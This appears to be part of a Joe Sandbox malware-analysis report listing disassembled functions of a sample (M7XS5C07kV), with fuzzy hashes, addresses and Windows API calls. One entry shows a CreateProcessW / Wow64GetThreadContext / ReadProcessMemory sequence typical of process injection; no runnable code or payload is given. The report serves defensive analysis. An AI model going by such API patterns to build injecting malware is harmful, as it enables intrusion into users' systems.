Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 79d59565487d929aa137a92cda0e0901e9b38d191e1adc415f1c449196af0867
Instruction ID: b56371a49e651d441e9eb42fa4111bc69dfedb011d64efa08cb85c678bfcd2e5
Opcode Fuzzy Hash: 79d59565487d929aa137a92cda0e0901e9b38d191e1adc415f1c449196af0867
Instruction Fuzzy Hash: 71018070284708BEF3344E28CC8AF763ADCFB01769F10831BBAE59A2E0D6B41C458B50

Function 005F0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F571C: __FF_MSGBANNER.LIBCMT ref: 005F5733
Part of subcall function 005F571C: __NMSG_WRITE.LIBCMT ref: 005F573A
Part of subcall function 005F571C: RtlAllocateHeap.NTDLL(00EA0000,00000000,00000001,00000000,?,?,?,005F0DD3,?), ref: 005F575F

std::exception::exception.LIBCMT ref: 005F0DEC
__CxxThrowException@8.LIBCMT ref: 005F0E01

Part of subcall function 005F859B: RaiseException.KERNEL32(?,?,?,00689E78,00000000,?,?,?,?,005F0E06,?,00689E78,?,00000001), ref: 005F85F0

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 860e6d369edf7f873704b0dda336639c233e100831aafb55a5ede3d6be9b72c4
Instruction ID: 2925dd7f81a01950d0e4f083dbabf5992e011a9d1ba458b9f92c7d97318b9e3c
Opcode Fuzzy Hash: 860e6d369edf7f873704b0dda336639c233e100831aafb55a5ede3d6be9b72c4
Instruction Fuzzy Hash: 79F0A47190021F66DB10BE94EC199FE7FADBF41351F144425FB14961C2DF749A50C6D1

Function 005F55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F562C
__lock_file.LIBCMT ref: 005F564D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 0ded1150a39ece1ca67e5c7f94eb3caf8f38b15c5c47913d8f7741a8d5e40154
Instruction ID: e2e01c19b46180d6aefe38c30c8dc5356c321f72f543ba7290520a1e5238328c
Opcode Fuzzy Hash: 0ded1150a39ece1ca67e5c7f94eb3caf8f38b15c5c47913d8f7741a8d5e40154
Instruction Fuzzy Hash: 4C01D471800A0EABCF12AF648C0A8BE7F61BFD0321F444115BB249A191EB398A11DF91

Function 005F53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005F8B28: __getptd_noexit.LIBCMT ref: 005F8B28

__lock_file.LIBCMT ref: 005F53EB

Part of subcall function 005F6C11: __lock.LIBCMT ref: 005F6C34

__fclose_nolock.LIBCMT ref: 005F53F6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: bcf7eb052a4a72685218f695197803d94dcf87ddc6fdaa344d95598e193f7d6c
Instruction ID: ae9939740165379a78dc92a4ac71cc2bd5fc918f297942cc3ac5cef236729266
Opcode Fuzzy Hash: bcf7eb052a4a72685218f695197803d94dcf87ddc6fdaa344d95598e193f7d6c
Instruction Fuzzy Hash: FAF09631900A0E9ADB116F7998097BD6EA07F81374F258605A764AB1C1DBFC49415B51

Function 005D8061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,005D542F,?,?,?,?,?), ref: 005D807A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,005D542F,?,?,?,?,?), ref: 005D80AD

Part of subcall function 005D774D: _memmove.LIBCMT ref: 005D7789

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 1968f3faf8ab35fc16a9c4ed060e87008defecdb80f2eb72764cb92220cff938
Instruction ID: 7c24fd0d24bec133133090ae8f9c4e0f9f7ee6ba80559b0881db3fd81c386c42
Opcode Fuzzy Hash: 1968f3faf8ab35fc16a9c4ed060e87008defecdb80f2eb72764cb92220cff938
Instruction Fuzzy Hash: 84016271201609BFEB246B25DD4AF7B3F6DEF89760F14802BFA05DE2D1DE619800C661

Function 00F242FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F24ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F24B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F24B73

Memory Dump Source

Source File: 00000000.00000002.1456569915.0000000000F23000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F23000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f23000_M7XS5C07kV.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 3e46bb0870f5154f3f74247896b240960d0b717e94558c95eed9fbb795a92b5e
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: DB12EE20E24658C6EB24DF60D8507DEB232FF68300F1091E9910DEB7A5E77A5E81CF5A

Function 005E1FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af5f612d6a78de91b3663f0b07d3c40d7526a94aa0ed0225509ed94fc0661bcc
Instruction ID: d2c47f09b4ba2f7773198e544d6ec2f2165e2c76b0c1b5ce110a070ef7a37a37
Opcode Fuzzy Hash: af5f612d6a78de91b3663f0b07d3c40d7526a94aa0ed0225509ed94fc0661bcc
Instruction Fuzzy Hash: 4B51A3356006059FCF24EF68C999EAD7BAABF85310F14446AF846AB396DB30ED01CB51

Function 005D5AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 005D5B96

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9c21c71b6df4df7c6488b44671f4e553e248c2c5bab4e847ae8fd2fb3d699067
Instruction ID: 3d312415ffe16786be56d2be7639d4e96d2f7da93ae4c7d4ca668eaa73937810
Opcode Fuzzy Hash: 9c21c71b6df4df7c6488b44671f4e553e248c2c5bab4e847ae8fd2fb3d699067
Instruction Fuzzy Hash: 08313C31A00A06AFDB28DF6CC484AADBBB5FF84311F14862BD81697750E770BD90CB91

Function 005F0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 005F0CB7

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f4b4cb2793963fe380a9d7b588dcc4d6226826be1e5765b04a5eeb082c73e68a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9E31D5B4A001099BC718DF58C484979FBA6FB59300B6897A5E90ACB396D735EDC1DBC0

Function 0060FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0060FCB7

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8106295f8a5a3331edb068fb6cf026d623e5098c90ab8b49766f47d94a1b11e9
Instruction ID: 9f346470826c6809aef043874b549fac87203ee1aa9500158bf15aa59fc18035
Opcode Fuzzy Hash: 8106295f8a5a3331edb068fb6cf026d623e5098c90ab8b49766f47d94a1b11e9
Instruction Fuzzy Hash: 3A410674504341DFDB24DF28C448B1ABBE1BF85318F0988ADE9998B762C735EC45CB52

Function 005F06FE Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a5e603f0079770d5d71275edcce625254a535ed970218698e91b123efdbab4
Instruction ID: b1b815c34634acc90d26a92397ee8f66793c4c9947f1b9805a15dbf3f3eb4e4a
Opcode Fuzzy Hash: c2a5e603f0079770d5d71275edcce625254a535ed970218698e91b123efdbab4
Instruction Fuzzy Hash: DF21FD376091855FD321DB28F483BE9BBE5FF82225B0C44AFD48487D92D6685846CB91

Function 005D59B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005D5A01

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 53bfbd4e787e622ff37163942d97674d5cfe18afb76c7105f53e811f4e96177c
Instruction ID: df8e043bcb27bb9c22a25c71038a06d51f30653fe1b2d19cafe4ce2b9654feee
Opcode Fuzzy Hash: 53bfbd4e787e622ff37163942d97674d5cfe18afb76c7105f53e811f4e96177c
Instruction Fuzzy Hash: 0A212371900A08FBDB289F95E88567B7FBEFF44310F208A6BE486C1191EB7080D0D741

Function 005D4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 005D4BEF

Part of subcall function 005F525B: __wfsopen.LIBCMT ref: 005F5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005D4E0F

Part of subcall function 005D4B6A: FreeLibrary.KERNEL32(00000000), ref: 005D4BA4

Part of subcall function 005D4C70: _memmove.LIBCMT ref: 005D4CBA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: fb420ad9c1cbf76da31efd2f615f29749eaf80e48d97b674e887cbf4624c8ed7
Instruction ID: ab7ae28df9540f6d0531a2a0c81f59aa463731516b152b640131504b350a9caa
Opcode Fuzzy Hash: fb420ad9c1cbf76da31efd2f615f29749eaf80e48d97b674e887cbf4624c8ed7
Instruction Fuzzy Hash: 98119831640206B7DF25AFB8C81AFAE7BA9FF84710F10882BF545A7281EA7199059F51

Function 0060FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0060FD91

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5335bc2d65cb59337d90c27cc983e2a8e3fc7c2f8da5c5dd530bfb833ec29e15
Instruction ID: 60fcb3cfc2c1648ecfdcff13c98d5c01b19aad06677d57f7ca3cbfc5d792273a
Opcode Fuzzy Hash: 5335bc2d65cb59337d90c27cc983e2a8e3fc7c2f8da5c5dd530bfb833ec29e15
Instruction Fuzzy Hash: 75211574908342DFDB24DF28C444A2ABBE1BF88314F098969F98A57762D731E845CB93

Function 005D5BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,005D56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 005D5C16

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3db4c93f7822c6916b1e93a7be67e0396d54d977a07892102a6906fb19614432
Instruction ID: c467d828ab299e2f418790a3520630bc8c9f8654955e97783b8009cfdc3bbd21
Opcode Fuzzy Hash: 3db4c93f7822c6916b1e93a7be67e0396d54d977a07892102a6906fb19614432
Instruction Fuzzy Hash: DF112831200B059FE3308F19C880B62BBE5FB44760F10C92FE9AA86B51E771E845CB60

Function 005D5A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0060DD18

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
Instruction ID: c926eecafbe76e9ca078d849ccd0c367a32c541fd608f524eb6586d9d275bf99
Opcode Fuzzy Hash: 9f3ded07322f352e8a10de6e5b29e511e5eed242f4c9ed39c3b1c7becfd31a48
Instruction Fuzzy Hash: D40184B9200902AFC315EB68C455D2AFBAAFF85310714456AF559C7742E735EC21CBE0

Function 005F4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 005F48A6

Part of subcall function 005F8B28: __getptd_noexit.LIBCMT ref: 005F8B28

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: c0c177999e0bdc3437764a7b627f4fed408d9d5e14bb332ec062fd83b59e938a
Instruction ID: 74f5d0229640e148686b6c8966037f13c34e76ebe804a7af66d1da59af232d9f
Opcode Fuzzy Hash: c0c177999e0bdc3437764a7b627f4fed408d9d5e14bb332ec062fd83b59e938a
Instruction Fuzzy Hash: 5BF0FF3190020EABDF11AFB48C0A3BF3EA1BF40360F058404B6209A181CBBC8951DF51

Function 005D4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,006952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005D4E7E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 073eb7d4ba7651f35237fa375a96123b221ebe1218a1d2179ba6b4e61fff1019
Instruction ID: b9c879ad2e2124460202ef9ecbfd0beeaec311075826e3a3e079fc0a766fe417
Opcode Fuzzy Hash: 073eb7d4ba7651f35237fa375a96123b221ebe1218a1d2179ba6b4e61fff1019
Instruction Fuzzy Hash: DCF0F271501B12EFCB349F68E494822BBE9FB543293208E2FE29682620C7329840DF41

Function 005F0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005F07B0

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d7a7415bc6e5c7aeb022fcfd0287242db0e3c3fcccd125220ed395f0dfb97162
Instruction ID: 06f07ecd1b359e1229a289a87ddba985c9fe955fec760251051cb7fa69e43e16
Opcode Fuzzy Hash: d7a7415bc6e5c7aeb022fcfd0287242db0e3c3fcccd125220ed395f0dfb97162
Instruction Fuzzy Hash: C2E0867694422857C720E6A89C05FEA77DDDBC97A1F0441B7FD0CD7244E9609D808690

Function 00638E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00638EC1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: dab2210c02b900347f340c1907142145d290b195eff0998d02324f459cdcd37e
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 7FE092B0104B045FD7398A24D800BE377E2EB05305F00081DF2AA83341EB6278458759

Function 005D5C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0060DD42,?,?,00000000), ref: 005D5C5F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
